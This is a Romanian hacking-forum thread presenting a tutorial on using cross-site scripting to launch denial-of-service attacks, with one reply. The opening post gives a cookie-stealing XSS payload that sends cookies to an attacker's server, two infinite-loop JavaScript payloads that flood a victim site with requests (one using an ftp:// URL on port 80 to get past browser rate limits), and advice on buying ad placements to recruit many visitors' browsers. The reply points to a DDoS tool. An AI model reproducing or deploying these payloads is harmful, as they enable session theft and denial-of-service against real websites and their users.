[TUT] DoS prin XSS

[Ganav]

M-am gandit la cum as putea exploata in alte moduri vulnerabilitatile de tip XSS in afara celor "clasice" de tipul:

<script>
new Image().src="http://siteulnostru.com/index.php?cookies="+encodeURI(document.cookie);
</script> 

unde index.php ne trimite cookie-urile prin e-mail, spre exemplu.

Vectorul XSS ar putea arata in felul urmator:

<html>
  <body>
    <script>

while(1) {
    var img = new Image();
    var url = "http://www.victima.com/";
    img.src = url;
    document.body.appendChild(img);
}

    </script>
  </body>
</html>

Script-ul de mai sus va face request-uri in continuu, in fundal, atata timp cat victima se gaseste pe pagina respectiva. Am observat, folosind wireshark, ca numarul de request-uri este relativ redus(in medie 5-6 req/s).

Se pare ca browsere-le limiteaza numarul de request-uri din motive de performanta. Am observat ca pentru protocolul ftp aceasta limita este mult mai ridicata(in medie 360-370 req/s). Putem modifica vectorul de mai sus in felul urmator:

<html>
  <body>
    <script>

while(1) {
    var img = new Image();
    var url = "ftp://www.victima.com:80/";
    img.src = url;
    document.body.appendChild(img);
}

    </script>
  </body>
</html>

Request-urile vor fi redirectionate catre portul 80, deci requestul va fi de tip http in final. Am mai observat ca nu toate site-urile realizeaza acest redirect.

Acum ne trebuie un numar cat mai mare de victime care sa viziteze pagina cu vectorul nostru. Avem, in principiu, doua metode:

1. Fie avem un XSS pe un site cu un traffic ridicat(de ex. yahoo.com)
   
2. Fie investim putin intr-un ad
   

Prima optiune este relativ dificil de exploatat. A doua, insa, este mai accesibila. Putem apela chiar si la un ad provider contra cost:

Clicksor Online Advertising

Retargeting and Display Advertising | AdRoll

Comparire su Kelkoo | Informazioni per shop online

Latimea de banda consumata depinde de cat de mult suntem dispusi sa platim.

[blech]

offtopic: @Ganav desi sunt de mult timp pe aici imi pare rau ca nu te-am remarcat pana acum. m-am uitat peste userul tau si am remarcat lucruri foarte interesante postate de tine, aparent iti meriti VIP-ul.

ontopic: cand am citit ce ai scris tu aici aveam impresia ca am mai auzit de asa ceva...acum mult timp, oricum felurile creative in care poti sa folosesti un XSS s-a tot scris de la cookie stealing (pe vremuri) pana la clickjacking, keylogger si acum denial of service.

ce mi-a atras atentia este bucata asta:

Script-ul de mai sus va face request-uri in continuu, in fundal, atata timp cat victima se gaseste pe pagina respectiva. Am observat, folosind wireshark, ca numarul de request-uri este relativ redus(in medie 5-6 req/s).

Se pare ca browsere-le limiteaza numarul de request-uri din motive de performanta. Am observat ca pentru protocolul ftp aceasta limita este mult mai ridicata(in medie 360-370 req/s).

aici mi-am dat seama de unde stiam despre ce ai scris tu, asa ca daca vreti o sursa mai veche care explica mai in detaliu...

la fel mi-a sunat clopotelul si cand ai zis de Ad Network... a se vedea tot in acel filmulte.

in alta ordine de idei ca sa realizam un simplu DDOS via XSS (sau nu) ca in primul exemplu dat de tine putem apela si la Abuse of Functionality ddos.

un tool facut special pentru AoF DDoS este asta: DAVOSET 1.2 ? Packet Storm

ps: scuze daca m-am exprimat putin incoerent dar scriu in graba si rezolv si ticketele de helpdesk in acelasi timp oricum cititi si resursele respective pentru ca sunt foarte ok.